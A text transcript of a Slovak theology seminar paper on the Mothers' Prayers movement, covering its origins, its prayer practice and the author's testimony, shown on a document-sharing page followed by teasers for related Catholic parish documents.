Microsoft Word - prakticka teologia_seminarka

Veľkosť: px
Začať zobrazovať zo stránky:

Download "Microsoft Word - prakticka teologia_seminarka"

Prepis

1 TRNAVSKÁ UNIVERZITA TEOLOGICKÁ FAKULTA Študijný odbor: Sociálna práca a katolícka teológia Bakalársky študijný program formácia a vedenie spoločenstiev Praktická teológia Hnutie Modlitby matiek Vyučujúci: ThDr. Ondrej Šmidriak PhD. ThDr.MUDr. Stanislava Prítrská Akademický rok 2011/2012 Ing. Helena Sochnová

2 Viera je veľký dar od Pána. Semienko viery zasiali do našich sŕdc väčšinou rodičia. Krehkú rastlinku treba polievať, vystavovať lúčom slnka, aby rástla, mocnela a potešila nás aj ostatných kvetom a krásnou vôňou. Tak je to aj s vierou - je potrebné sa o ňu starať, aby bola stále živá a svojím ovocím priťahovala aj druhých. Vodou a slnkom pre vieru je okrem nedeľnej svätej omše a sviatostí, túžba lepšie poznať svojho Pána, stretávať sa s ním v modlitbe, zdieľať svoju vieru s ľuďmi s rovnakou krvnou skupinou, realizovať a ohlasovať ju vo svete, vo vzťahoch, v ktorých žijeme. Máme to šťastie, že žijeme v dobe, ktorá toto všetko umožňuje. Druhá polovica dvadsiateho storočia priniesla do Cirkvi úžasný fenomén nových cirkevných a laických hnutí, najmä potom, ako Druhý vatikánsky koncil otvoril okná aj dvere tomuto novému vanutiu Ducha Svätého. Práve nové hnutia sa prevažnou mierou postarali o rozvoj vlastnej originálnej a bohatej laickej spirituality. V dokumentoch Druhého vatikánskeho koncilu nájdeme v Dekréte o apoštoláte laikov takto zadefinovanú spiritualitu laika zameranú na apoštolát: Keďže Kristus, ktorého poslal Otec, je prameňom a počiatkom celého apoštolátu Cirkvi, je zrejmé, že plodnosť apoštolátu laikov závisí od ich životného spojenia s Kristom, ako to on sám hovorí: Kto ostáva vo mne a ja v ňom, prináša veľa ovocia; lebo bezo mňa nemôžete nič urobiť (Jn 5,5). 1 Aj svätý Otec Ján Pavol II. v encyklike Redemptoris Missio konštatuje, že v Cirkvi sú rôzne formy kresťanského spôsobu života, ale zvlášť myslí na novotu, ktorá sa v poslednej dobe objavila vo viacerých cirkvách: na veľký rozvoj cirkevných hnutí, ktoré sa vyznačujú mocnou misionárskou silou. A ako ďalej konštatuje, ak sa tieto hnutia začlenia do pastoračných štruktúr v diecézach a farnostiach budú znamenať pre novú evanjelizáciu a pre misijnú prácu v pravom slova zmysle slova skutočný Boží dar. Môžeme povedať, že konštatovanie Jána Pavla II. bolo prorockým nahliadnutím do budúcnosti, a preto odporúčal hnutia propagovať a zapájať do činnosti najmä medzi mládežou. Významným medzníkom zviditeľnenia a požehnania činnosti hnutí v novodobých dejinách bol Svetový kongres Cirkevných hnutí vo Vatikáne mája Zároveň 1 Dokumenty Druhého vatikánskeho koncilu, Dekrét o apoštoláte laikov. In: Oficiálna stránka Katolíckej cirkvi na Slovensku. online. Dostupné na: 2

3 je symbolické, že na Kongrese patrili k dôležitým prejavom príhovor Jána Pavla II., vtedajšieho pápeža, a príhovor kardinála Ratzingera, ktorý sa stal jeho nástupcom ako Benedikt XVI. Táto symbolika akoby chcela potvrdiť nastúpenú líniu chápania, prijatia a začlenenia hnutí do aktívneho života Katolíckej cirkvi. Príhovory oboch dôstojných predstaviteľov vytvorili či potvrdili zároveň určitú ideovú platformu, odrazový mostík, konaniu a požehnaniu, ktoré chce Duch Svätý vniesť do značne sekularizovaného sveta skrze hnutia. 2 Jedným z hnutí, ktoré sa k nám rozšírilo zo zahraničia je ekumenické hnutie Modlitby Matiek. Vzniklo v Anglicku roku 1995, keď dve mamy - Veronica Williams a jej švagriná Sandra - pocítili volanie a potrebu modlitby za svoje deti. Takto o tom hovorí sama Veronica: Istý čas sme spolu s mojou švagrinou Sandrou cítili potrebu modliť sa odovzdanejšie za svoje deti. Boli sme povolané začať s novou modlitebnou skupinou, ktorá by sa modlila špeciálne za deti, a pozvať aj iné matky, aby sa k nám pripojili. Dostali sme úžasné odpovede a dnes vieme, že táto modlitebná skupina je Pánova. Bolo to veľmi požehnané! Zistili sme, že mnohé matky mali podobné predstavy a pripojili sa k nám! Je veľmi potešujúce vedieť, že nie sme samy a že ďalšie sa pripájajú k našim modlitbám na rozličných miestach sveta. Na začiatku, keď som sa modlila, aby nás Pán viedol, otvorila som Bibliu náhodne na strane Jeremiáš 31, 16. Aké nádherné potvrdenie ak by som prehľadala celú Bibliu, nenašla by som lepší verš: Prestaňte plakať a utrite si slzy, všetko, čo ste urobili pre svoje deti, nezostane bez odmeny. 3 Odpoveďou na ich modlitby bol vznik Komunity Útecha. Modlitby matiek sú dnes v 85 krajinách celého sveta. Od roku 1999 sa každý rok koná konferencia koordinátoriek 2 Z príhovoru otca biskupa Stanislava Stolárika, Dostupné na: 3 Z príhovoru Veronicy, zakladateľky hnutia Modlitby matiek v Anglicku, Dostupné na: 3

4 Modlitieb matiek z celého sveta. Na nej sa stretnú matky z jednotlivých štátov, aby sa spolu modlili za komunitu Útecha. Na Slovensku sa v apríli roku 1996 začali dve matky modliť za svoje deti. Bez akejkoľvek reklamy sa tieto modlitby rozšírili do celého Slovenska. Stretnutia sa konajú v malých skupinkách dve až osem matiek, jedenkrát v týždni, vždy v ten istý čas a v tú istú hodinu. Tak vzniká nepretržitý reťazec modlitieb matiek na celom svete. Len na Slovensku sú modlitbami matiek pokryté všetky dni v týždni od rána od piatej hodiny do neskorého večera. Spiritualita Modlitieb matiek je spiritualita života Panny Márie. Cez modlitbu a úplnú dôveru v Božiu všemohúcnosť kráčať životom jednoduchosti, pokory a lásky. Pred dvoma rokmi som dostala pozvanie do modlitbovej skupinky v Bratislave vo farnosti pri kostole Najsvätejšieho Srdca Ježišovho na Kramároch. Pri našich modlitbách sedíme alebo kľačíme okolo stola, na ktorý položíme kríž, Sväté písmo, sviečku a košík, do ktorého na záver stretnutia vkladáme papierové krúžky s menami našich detí a tých, ktorých chceme odovzdať do Ježišových rúk. Na každom stretnutí sa vždy modlíme z knižočky MM, ku ktorým môžeme pridať aj spontánne modlitby. Modlitby v knižočke sú jednoduché slová, ktorými sa materské srdce prihovára Otcovi. Hneď na začiatku prosíme Ducha Svätého, aby viedol naše stretnutie. Prosíme za ochranu, odprosujeme a odpúšťame, modlíme sa za jednotu srdca a mysle všetkých v skupinke, chválime Pána piesňou a modlitbou, čítame Sväté písmo, pri ktorom sa zdieľame s ostatnými matkami so svojimi problémami. Všetky problémy vkladáme do modlitby a prosíme Pána Ježiša o Jeho riešenie. Odovzdávame do rúk Pána Ježiša svoje deti s veľkou dôverou, že On jediný ich môže uchrániť od všetkého zla. Snažíme sa porozumieť tomu, čo Pán chce každej jednej z nás osobitne povedať. Keď jedna matka odovzdáva svoje deti do Ježišových rúk, ostatné ju v tichu podporujú modlitbou. Na Modlitbách matiek sa ani jedna mama nemodlí sama. Skrze tieto modlitby zažívame hlboký pokoj a požehnanie, lebo sa osobne stretávame s Ježišom a aj preto, lebo cítime podporu ostatných matiek. Cez modlitby Pán utvára nové priateľstvá. Sme otvorené prijať do skupinky nové mamy telesné, ale aj duchovné. Nezabúdame, že nemusia byť z rovnakej cirkvi ako my, prípadne 4

5 nemusia mať ani skúsenosti s modlitbou v malom spoločenstve. Modlíme sa, aby Pán poslal do našich skupiniek všetky mamy, ktoré tam on chce mať a ktoré to potrebujú. Okrem týchto týždenných stretnutí sa každý štvrťrok koná Modlitebné trojdnie. Presný dátum určuje zakladateľka komunity Útecha. V modlitbách sa duchovne spájajú ľudia z celého sveta. Modlíme sa na rovnaké úmysly nasledovne: Piatok - odprosujeme za svoje hriechy. Sobota - odprosujeme za tých, ktorí ublížili nám a našim deťom. Prosíme o ich obrátenie. Nedeľa - ďakujeme a chválime Pána za všetko čo spravil v našich životoch. Od roku 1997 sa na Slovensku konajú každý rok na jar veľké stretnutia MM. Od vzniku MM na Slovensku nás svojimi modlitbami sprevádza náš duchovný otec brat Gabriel, kapucín, ktorého poverila touto úlohou naša zakladateľka Veronica Williams so súhlasom otca biskupa Rudolfa Baláža. Práve tento mesiac máme už 6. výročie posviacky Kaplnky sv. Gianny Berettovej- Mollovej v našom komunitnom dome Útecha v Bratislave. Od 9. novembra do 15. novembra bude v nej každý deň ďakovná adorácia zato, že ju máme. Každý deň sa budeme modliť tretí desiatok radostného ruženca a tiež modlitbu k svätému Jozefovi, ktorý je patrónom celého nášho domu. V deň výročia posviacky v stredu 16. novembra 2011 bude slávnostná svätá omša.. Po nej pri malom pohostení pospomíname na začiatky Modlitieb matiek na Slovensku. Dnes sa v našej krajine modlia tisíce matiek v malých skupinkách. Do komunity Útecha okrem skupín Modlitieb matiek pribudli aj skupinky Modlitieb otcov a Detí viery. Otcovia biskupi zo všetkých diecéz vyjadrili spokojnosť s ovocím MM, ktoré vidia vo svojich diecézach, a dali nám svoje požehnanie pre ďalšie pôsobenie. Vo svojich listoch vyjadrili radosť so vznikom Modlitieb otcov. Na záver by som ešte chcela pripojiť vlastné svedectvo. Pozvanie do modlitebnej skupinky ma zastihlo v čase, keď mala naša prvá dcérka Barborka dva a pol roka. Pod srdcom som nosila už našu druhú dcérku Dominiku. Bola to pre mňa prvá skúsenosť so spoločenstvom ako takým. Hneď od začiatku som to vnímala ako pozvanie od Pána a jeho láskyplnú starostlivosť o mňa. Stále sa učím byť dobrou mamou a manželkou. Veľa 5

6 situácií, ktoré teraz zažívam sú pre mňa nové a často aj veľmi náročné. Modlitby z knižočky MM mi pomohli lepšie prijať a pochopiť povolanie materstva. Tieto stretnutia ma učia všetky svoje starosti odovzdávať Pánovi a uvedomiť si, že deti sú obrovským darom od Pána. Naša skupinka je pre mňa veľkým obohatením a povzbudením. Pomohla nám začleniť sa aj do spoločenstva mladých rodín v tejto farnosti. Prostredníctvom MM som bola pozvaná aj do služby v rámci rôznych cirkevných podujatí súvislého čítania Svätého písma, pri misiách v Bratislave, modlitieb a pôstu za kňazov. A môžem len potvrdiť, že modlitby matiek sú darom všemohúceho Boha matkám týchto čias nato, aby mohli prežívať svoje materstvo v novej radosti a nádeji. 6

7 Zoznam použitej literatúry: Sväté písmo Starého a Nového zákona Druhý Vatikánsky koncil, Dekrét o apoštoláte laikov Ján Pavol II.: Redemptoris Missio Príhovor otca biskupa Stanislava Stolárika 7

C:/Users/benny/Desktop/2018_01/2018_01.sla

C:/Users/benny/Desktop/2018_01/2018_01.sla Michael Úvodník KALENDÁR UDALOSTÍ 2018 FARNOSŤ SKALICA Streda 14. február: Popolcová streda začiatok Pôstneho obdobia Sobota 3. marec: Pôstna duchovná obnova s Br. Mgr. Richardom Mariánom Jombíkom

Podrobnejšie

SPRAVODAJ Rímskokatolícka farnosť Kráľovnej pokoja Košice Juh 12/ Bratislavská sviečková manifestácia z 25. marca 1988 vstúpila do dejín

SPRAVODAJ Rímskokatolícka farnosť Kráľovnej pokoja Košice Juh 12/ Bratislavská sviečková manifestácia z 25. marca 1988 vstúpila do dejín SPRAVODAJ Rímskokatolícka farnosť Kráľovnej pokoja Košice Juh 12/2018 25.3.2018 Bratislavská sviečková manifestácia z 25. marca 1988 vstúpila do dejín ako jeden z najvýznamnejších verejných prejavov odporu

Podrobnejšie

Ježišu, dôverujem ti! Nedeľa Božieho milosrdenstva 3. apríla 2016 HODINA MILOSRDENSTVA (pre 3 čítajúcich) 14:55 hod. Vyloženie Najsvätejšej oltárnej s

Ježišu, dôverujem ti! Nedeľa Božieho milosrdenstva 3. apríla 2016 HODINA MILOSRDENSTVA (pre 3 čítajúcich) 14:55 hod. Vyloženie Najsvätejšej oltárnej s Ježišu, dôverujem ti! Nedeľa Božieho milosrdenstva 3. apríla 2016 HODINA MILOSRDENSTVA (pre 3 čítajúcich) 14:55 hod. Vyloženie Najsvätejšej oltárnej sviatosti Kňaz (3x): Ó, krv a voda, ktorá si vyšla z

Podrobnejšie

Poďakovanie za 13. slovenskú púť do Lúrd Mnohí ľudia cestujú za hranice svojej vlasti, aby spoznávali prírodnú krásu, históriu a kultúru iných krajín,

Poďakovanie za 13. slovenskú púť do Lúrd Mnohí ľudia cestujú za hranice svojej vlasti, aby spoznávali prírodnú krásu, históriu a kultúru iných krajín, Poďakovanie za 13. slovenskú púť do Lúrd Mnohí ľudia cestujú za hranice svojej vlasti, aby spoznávali prírodnú krásu, históriu a kultúru iných krajín, aby strávili dovolenku v príjemnom prostredí a načerpali

Podrobnejšie

Oznamy

Oznamy VII 12 23.06.2019 OZNAMY Zmena času sv. omší Zvlášť počas letných mesiacov júl august, bude zmena sv. omší. Prosím vás, aby ste si dobre pozreli liturgický prehľad. Prikázaný sviatok 29.6.2019 V sobotu,

Podrobnejšie

Program pešej púte Bratislavská Kalvária - Lurdská jaskyňa - Železná studnička - Kačín - Marianka. Pešiu púť tvorí 10 zastavení: Počas pochodu budeme

Program pešej púte Bratislavská Kalvária - Lurdská jaskyňa - Železná studnička - Kačín - Marianka. Pešiu púť tvorí 10 zastavení: Počas pochodu budeme Program pešej púte Bratislavská Kalvária - Lurdská jaskyňa - Železná studnička - Kačín - Marianka. Pešiu púť tvorí 10 zastavení: Počas pochodu budeme spievať piesne a modliť sa. 1. Lurdská jaskyňa: TÚŽBY

Podrobnejšie

Zdravé sebavedomie odzrkadľuje spôsob, akým vidíme sami seba. Ak sa chceme stať sebavedomejšími ľuďmi, musíme zmeniť to, čo si myslíme sami o sebe, ak

Zdravé sebavedomie odzrkadľuje spôsob, akým vidíme sami seba. Ak sa chceme stať sebavedomejšími ľuďmi, musíme zmeniť to, čo si myslíme sami o sebe, ak Zdravé sebavedomie odzrkadľuje spôsob, akým vidíme sami seba. Ak sa chceme stať sebavedomejšími ľuďmi, musíme zmeniť to, čo si myslíme sami o sebe, ako sa vidíme a vnímame. S týmto obrazom budeme pracovať

Podrobnejšie

zvesti-apríl2015

zvesti-apríl2015 Bojnické zvesti ročník 41 Apríl Apríl 2015 2015 PRÍHOVOR PRIMÁTORA Vážení spoluobčania, v dnešnej uponáhľanej dobe si už ani neuvedomujeme, ako čas ubieha neúprosne rýchlo. Nestačíme vnímať ako sa nám

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint Biblická súťaž Bratislavskej arcidiecézy 1. Odpovedz na otázky Ježišov príchod do ktorého mesta sa spomína v 2. kapitole Evanjelia sv Marka? A/ Kafarnaum B/ Jeruzalem C/ Nazaret Farizeji vyčítali Ježišovi,

Podrobnejšie

BULLETIN Jún

BULLETIN Jún BULLETIN Jún HOSPODIN JE MÔJ PASTIER Žalmy sú úžasnou časťou Biblie. Sú to básne, piesne, chvály, modlitby, múdrosti a vyznania. Asi žiadna iná z biblických kníh neodpovedá na toľko otázok každodenného

Podrobnejšie

Microsoft Word - posolstvo synody

Microsoft Word - posolstvo synody BISKUPSKÁ SYNODA 13. RIADNE VALNÉ ZHROMAŽDENIE BISKUPSKEJ SYNODY 7. - 28. OKTÓBRA 2012 Posolstvo Božiemu ľudu Bratia sestry, Milosť vám a pokoj od Boha, nášho Otca, i od Pána Ježiša Krista (Rim 1, 7).

Podrobnejšie

Predmetová anketa

Predmetová anketa Letný semester 2017/2018 Predmetová anketa Teologická fakulta TRNAVSKÁ UNIVERZITA V TRNAVE Milé študentky a študenti, ďakujeme Vám za vyplnenie predmetovej ankety za letný semester akademického roku 2017/18.

Podrobnejšie

Rímskokatolícky farský úrad; Farnosť sv. Jozefa robotníka; Nábrežie Jána Pavla II. č. 3; Svit; Tel.: ; Mobil: ; Mail:

Rímskokatolícky farský úrad; Farnosť sv. Jozefa robotníka; Nábrežie Jána Pavla II. č. 3; Svit; Tel.: ; Mobil: ; Mail: 14.5.2017 21.5.2017 vo farnosti SVIT 14.5.2017 NE: 5. veľkonočná nedeľa 15.5.2017 PO: Féria 16.5.2017 UT: Sv. Jána Nepomuckého, kňaza a mučeníka 17.5.2017 ST: Féria 18.5.2017 ŠT: Féria 19.5.2017 PI: Féria

Podrobnejšie

LINEAMENTA 2015

LINEAMENTA 2015 LINEAMENTA 2015 ÚVOD Prvý synodálny dokument Synody Ordinariátu ozbrojených síl a ozbrojených zborov Slovenskej republiky (ďalej Ordinariát OS a OZ SR) s názvom Lineamenta (z lat. linea - línia) je pracovný

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint KTO SPOZNÁVA BIBLIU SPOZNÁVA KRISTA. Biblia je súbor kníh, ktoré hovoria o zmluve, ktorú Boh uzavrel s Izraelom skrze Mojžiša a ktorú naplnil v Kristovi. Je to Bohom vnuknuté slovo. Nie diktát. Nespadla

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint Biblická súťaž Bratislavskej arcidiecézy 1. Odpovedz na otázky Ježišov príchod do ktorého mesta sa spomína v 2. kapitole Evanjelia sv Marka? A/ Kafarnaum B/ Jeruzalem C/ Nazaret A; Mk 2, 1 Farizeji vyčítali

Podrobnejšie

Kat Infolist 17 tyzden 11

Kat Infolist 17 tyzden 11 Liturgický kalendár: KATEDRÁLNY INFOLIST 25.4. 1.5.2011 Želáme vám a vyprosujeme optimizmus sily života, ktorý dáva Ježiš svojim zmŕtvychvstaním. Buďme tými, ktorí všade vnášajú radosť Kristovho života.

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint STVORENIE SVETA (Gn 1, 1-27) Úvod do knihy Genezis gr. význam pôvod, vznik Opisuje začiatky Božieho stvoriteľského diela a dejín spásy. Opisuje počiatok stvorenia, počiatok ľudstva, počiatok soboty, manželstva,

Podrobnejšie

Predslov Štýl tohto výkladu sa možno mnohým bude zdať zvláštny; bude sa im zdať príliš prísny na to, aby mohol byť formačný, a príliš formačný na to,

Predslov Štýl tohto výkladu sa možno mnohým bude zdať zvláštny; bude sa im zdať príliš prísny na to, aby mohol byť formačný, a príliš formačný na to, Predslov Štýl tohto výkladu sa možno mnohým bude zdať zvláštny; bude sa im zdať príliš prísny na to, aby mohol byť formačný, a príliš formačný na to, aby mohol byť prísne vedecký. Na to druhé nemám nijaký

Podrobnejšie

Milé študentky, milí študenti, v prvom rade vám ďakujeme za vyplnenie ankety. Táto anketa bola zameraná na zistenie vášho postoja ku kvalite výučby. J

Milé študentky, milí študenti, v prvom rade vám ďakujeme za vyplnenie ankety. Táto anketa bola zameraná na zistenie vášho postoja ku kvalite výučby. J Milé študentky, milí študenti, v prvom rade vám ďakujeme za vyplnenie ankety. Táto anketa bola zameraná na zistenie vášho postoja ku kvalite výučby. Jednotlivé výroky sme vyhodnotili zastúpením vášho súhlasu,

Podrobnejšie

Pracovný list č

Pracovný list č Meno Priezvisko Pracovný list č. 11 Zmluva s Bohom farnosť Milý priateľ/ka! Tak sa pomaly blížime k záveru našej cesty. Mnohé sme za ten čas spoznali. A mnohé aj urobili. V Tvojom živote nastali zmeny:

Podrobnejšie

Microsoft Word - Document4

Microsoft Word - Document4 Hľadať poznanie o Nebeskom Otcovi a Jeho Synovi Ježišovi Kristovi Starší Robert D. Hales Kvórum dvanástich apoštolov Svetlo viery je vo vás a čaká, kým bude prebudené a zintenzívnené Duchom Božím. Moji

Podrobnejšie

Microsoft Word - bd7c-847f-df2b-6465

Microsoft Word - bd7c-847f-df2b-6465 Náboženská výchova 1. ročník Charakteristika vyučovacieho predmetu Keďže človek je z psychologického a sociologického hľadiska prirodzene bytosť náboženská, má potrebu smerovať k tomu, čo ho presahuje.

Podrobnejšie

Institut_vyrocna_sprava_2012

Institut_vyrocna_sprava_2012 Výročná správa neziskovej organizácie Inštitút teológie, misie a sociálnej práce, n. o., n.o. za rok 2012 V Tajove, 29/03/2013 1 OBSAH: 1. ÚVOD 3 2. PREHĽAD ČINNOSTÍ USKUTOČNENÝCH ORGANIZÁCIOU ZA ROK 2012

Podrobnejšie

8 Týždeň od 18. do 24. februára 54 Svätý Duch a duchovné dary Texty na tento týždeň 1Kor 12,4 7.11; Ef 4,7; 1Kor 12,14 31; Rim 12,3 8; 1Ján 4,1 3 Zákl

8 Týždeň od 18. do 24. februára 54 Svätý Duch a duchovné dary Texty na tento týždeň 1Kor 12,4 7.11; Ef 4,7; 1Kor 12,14 31; Rim 12,3 8; 1Ján 4,1 3 Zákl 8 Týždeň od 18. do 24. februára 54 Svätý Duch a duchovné dary Texty na tento týždeň 1Kor 12,4 7.11; Ef 4,7; 1Kor 12,14 31; Rim 12,3 8; 1Ján 4,1 3 Základný text 4 Preto sú dary milosti rôzne, ale Duch je

Podrobnejšie

Snímka 1

Snímka 1 PRÁCA S MLÁDEŽOU A SLOVENSKÝ HOKEJ KONFERENCIA 2MB - dva milióny budúcností - - Správa o mládeži 2018 Bratislava, 21. 22.6.2018 Hokej ako spoločenský fenomén S L O V E N S K Ý Z V Ä Z Ľ A D O V É H O H

Podrobnejšie

Apoštolské hnutie Božieho milosrdenstva Od chvíle keď sa ukázal Denníček sv. Sestry Faustíny, mnoho ľudí sa pýta, či taká kongregácia existuje, kde sa

Apoštolské hnutie Božieho milosrdenstva Od chvíle keď sa ukázal Denníček sv. Sestry Faustíny, mnoho ľudí sa pýta, či taká kongregácia existuje, kde sa Apoštolské hnutie Božieho milosrdenstva Od chvíle keď sa ukázal Denníček sv. Sestry Faustíny, mnoho ľudí sa pýta, či taká kongregácia existuje, kde sa nachádza, a ktorá je to kongregácia. Iní skúšajú zakladať

Podrobnejšie

F a r s k ý l i s t Gréckokatolícka cirkev, Farnosť Povýšenia sv. Kríža, Prešov-Sekčov Úvodník ročník X. Zdá sa mi, že život Cirkvi

F a r s k ý l i s t Gréckokatolícka cirkev, Farnosť Povýšenia sv. Kríža, Prešov-Sekčov Úvodník ročník X. Zdá sa mi, že život Cirkvi F a r s k ý l i s t 21 2015 11.10.2015 Gréckokatolícka cirkev, Farnosť Povýšenia sv. Kríža, Prešov-Sekčov Úvodník ročník X. Zdá sa mi, že život Cirkvi naberá vyššie obrátky. Tento mesiac prebieha synoda

Podrobnejšie

Založené 1999 Pokoj a dobro Katolícky časopis farnosti Markušovce Ročník 12 Číslo 5 November 2010 Voľba Foto: Peter Lazor Čitateľom kvalitnej literatú

Založené 1999 Pokoj a dobro Katolícky časopis farnosti Markušovce Ročník 12 Číslo 5 November 2010 Voľba Foto: Peter Lazor Čitateľom kvalitnej literatú Založené 1999 Katolícky časopis farnosti Markušovce Ročník 12 Číslo 5 November 2010 Voľba Foto: Peter Lazor Čitateľom kvalitnej literatúry určite nie je neznáma kniha Sofiina voľba. Príbeh mladej Poľky,

Podrobnejšie

osnovy nav 5. roč.

osnovy nav 5. roč. Obsah predmetu náboženská výchova v 5. ročníku ZŠ: Ročníková téma: Poznávanie cez dialóg V tomto veku dieťa stále viac naväzuje a rozvíja vzťahy s okolitým svetom formou dialógu. Dialóg rozvíja nie len

Podrobnejšie

Pobožnosť na vigíliu Narodenia Pána (v rodinách)

Pobožnosť na vigíliu Narodenia Pána (v rodinách) POBOŽNOSŤ NA VIGÍLIU NARODENIA PÁNA (v rodinách) Bezprostredne pred štedrou večerou sa rodina zíde na túto modlitbu. Vstupuje ňou do slávnosti Narodenia Pána. Miestom modlitby môže byť miesto, kde sa rodina

Podrobnejšie

Dobrovoľný príspevok: 0,20 Pohľad na kríž V tomto pôstnom čase mnohokrát uvažujeme o kríži Kristovom, aj tom našom. Môžeme povedať, že kríž je pre nás

Dobrovoľný príspevok: 0,20 Pohľad na kríž V tomto pôstnom čase mnohokrát uvažujeme o kríži Kristovom, aj tom našom. Môžeme povedať, že kríž je pre nás Dobrovoľný príspevok: 0,20 Pohľad na kríž V tomto pôstnom čase mnohokrát uvažujeme o kríži Kristovom, aj tom našom. Môžeme povedať, že kríž je pre nás knihou, z ktorej možno čítať; je knihou, v ktorej

Podrobnejšie

Letné aktivity 2019 Motto letných aktivít : Čo môžem urobiť ja, aby som pretváral svet okolo seba? Júl 2019 Prvý týždeň: prihlasovanie sa na

Letné aktivity 2019 Motto letných aktivít : Čo môžem urobiť ja, aby som pretváral svet okolo seba? Júl 2019 Prvý týždeň: prihlasovanie sa na Letné aktivity 2019 Motto letných aktivít : Čo môžem urobiť ja, aby som pretváral svet okolo seba? Júl 2019 Prvý týždeň: 1.7.2019 prihlasovanie sa na jednotlivé aktivity CSPR, predstavenie aktivít priestor

Podrobnejšie

CHUDOBA KOSICE Program konferencie

CHUDOBA KOSICE Program konferencie V rámci Európskeho roku boja proti chudobe a sociálnemu vylúčeniu Fórum kresťanských inštitúcií Sociálna subkomisia KBS Teologická fakulta Katolíckej univerzity Košice Košický samosprávny kraj Mesto Košice

Podrobnejšie

Hlas Medjugoria 2010_ 11

Hlas Medjugoria 2010_ 11 Hlas Med Medžugoria Časopis modlitbových skupín N O V E M B E R 2 0 1 0 MODLITBOVÝ ÚMYSEL NA MESIAC: m o d l i m e s a z a SVÄTÉHO OTCA, BISKUPOV A ZASVÄTENÉ OSOBY. V T O M T O Č Í S L E N Á J D E T E...

Podrobnejšie

Kritériá Právnická fakulta

Kritériá Právnická fakulta Kritériá na získanie vedecko-pedagogického titulu docent a kritériá na získanie vedecko-pedagogického titulu profesor Trnavskej univerzity v Trnave, Právnickej fakulty Kritériá na získanie vedecko-pedagogického

Podrobnejšie

Cesta.indd

Cesta.indd Informačník kežmarských katolíkov Cesta 1 XXV. ročník 2019 Svätí a biblické postavy boli témou karnevalu, ktorý sa uskutočnil koncom januára v ZŠ sv. Kríža. Ten zorganizovali pre mladých kežmarských koledníkov

Podrobnejšie

Microsoft Word - Čnosti.doc

Microsoft Word - Čnosti.doc Povolanie máme v konečnom dôsledku len jedno, a to dokonalosť. Svätý Otec Ján Pavol II. v encyklike Vita consecrata hovorí: Všetci sme pozvaní k dokonalosti. Túto výzvu na svätosť možno prijať a rozvíjať

Podrobnejšie

Posolstvo Panny Márie, Kráľovnej pokoja z 25. jannuára 2008: Drahé deti! S pôstnym obdobím sa približujete času milosti. Vaše srdce je ako pooraná zem

Posolstvo Panny Márie, Kráľovnej pokoja z 25. jannuára 2008: Drahé deti! S pôstnym obdobím sa približujete času milosti. Vaše srdce je ako pooraná zem Posolstvo Panny Márie, Kráľovnej pokoja z 25. jannuára 2008: Drahé deti! S pôstnym obdobím sa približujete času milosti. Vaše srdce je ako pooraná zem a je pripravené prijať plod, ktorý vyrastie v dobro.

Podrobnejšie

Bulletin16-17.indd

Bulletin16-17.indd Život Cirkvi Ročník 17 16-17/2011 Z tvojho Vzkriesenia, Kriste, raduje sa nebo a zem KOMENTÁR Tiché Božie milosrdenstvo Nedeľa Božieho milosrdenstva sa nám už akosi automaticky spája s Krakovom a svätou

Podrobnejšie

Microsoft Word - lutost.doc

Microsoft Word - lutost.doc ĽÚTOSŤ Petrova a Judášova ľútosť Nie každý pocit viny je výrazom pravej ľútosti nad hriechmi a otvorením sa Božiemu milosrdenstvu. V Evanjeliu nachádzame dva druhy ľútosti: Judášovu a Petrovu ľútosť. Judáš

Podrobnejšie

1,4 milióna hladujúcich detí 1,4 milióna príbehov Aj vďaka Vašej podpore to môžu byť príbehy so šťastným koncom Priniesol som ho do nemocnice v náručí

1,4 milióna hladujúcich detí 1,4 milióna príbehov Aj vďaka Vašej podpore to môžu byť príbehy so šťastným koncom Priniesol som ho do nemocnice v náručí 1,4 milióna hladujúcich detí 1,4 milióna príbehov Aj vďaka Vašej podpore to môžu byť príbehy so šťastným koncom Priniesol som ho do nemocnice v náručí - Pierre a jeho uzdravenie z podvýživy UNICEF/UN0239556/Gilbertson

Podrobnejšie

SPRAVODAJCA SLOVENSKÉHO ZDRUŽENIA CIRKVI ADVENTISTOV S.D. d e c e m b e r O d k i a ľ kam? Hagar...! Odkiaľ prichádzaš a kam ideš?... Navráť s

SPRAVODAJCA SLOVENSKÉHO ZDRUŽENIA CIRKVI ADVENTISTOV S.D. d e c e m b e r O d k i a ľ kam? Hagar...! Odkiaľ prichádzaš a kam ideš?... Navráť s SPRAVODAJCA SLOVENSKÉHO ZDRUŽENIA CIRKVI ADVENTISTOV S.D. d e c e m b e r 2 0 1 2 O d k i a ľ kam? Hagar...! Odkiaľ prichádzaš a kam ideš?... Navráť sa ku svojej panej... 1Moj 16,8.9; Sú ľudia, ktorí si

Podrobnejšie

t_spiritualita_evanjelizacie

t_spiritualita_evanjelizacie Spiritualita evanjelizácie vo svetle encykliky Evangelii nuntiandi Mgr. Ing. Peter Komanický V apoštoláte dnešnej doby zaujíma proces evanjelizácie popredné miesto. Je to pre Cirkev záväzok, ktorý rozhoduje

Podrobnejšie

FARSKÁ RODINA TROJMESAČNÍK SPIŠSKONOVOVESKÝCH KATOLÍKOV Ročník VI. * Číslo 1 * január marec 2016 MILOSRDNÍ AKO OTEC

FARSKÁ RODINA TROJMESAČNÍK SPIŠSKONOVOVESKÝCH KATOLÍKOV Ročník VI. * Číslo 1 * január marec 2016 MILOSRDNÍ AKO OTEC FARSKÁ RODINA TROJMESAČNÍK SPIŠSKONOVOVESKÝCH KATOLÍKOV Ročník VI. * Číslo 1 * január marec 2016 MILOSRDNÍ AKO OTEC farskarodina@gmail.com www.snv.fara.sk Veľká noc oslava milosrdenstva Boha Obľúbeným

Podrobnejšie

2/2013 CHARIZMA Je to práve Duch Svätý, ktorý nám dáva silu kráčať. pápež František časopis pre katolícku charizmatickú obnovu a evanjelizáciu

2/2013 CHARIZMA Je to práve Duch Svätý, ktorý nám dáva silu kráčať. pápež František časopis pre katolícku charizmatickú obnovu a evanjelizáciu 2/2013 CHARIZMA Je to práve Duch Svätý, ktorý nám dáva silu kráčať. pápež František časopis pre katolícku charizmatickú obnovu a evanjelizáciu Najsvätejšia Trojica, nebeský Otec, Syn a Duch Svätý! Ďakujeme

Podrobnejšie

Microsoft Word - Pastoračné dokumenty Jána Pavla II.doc

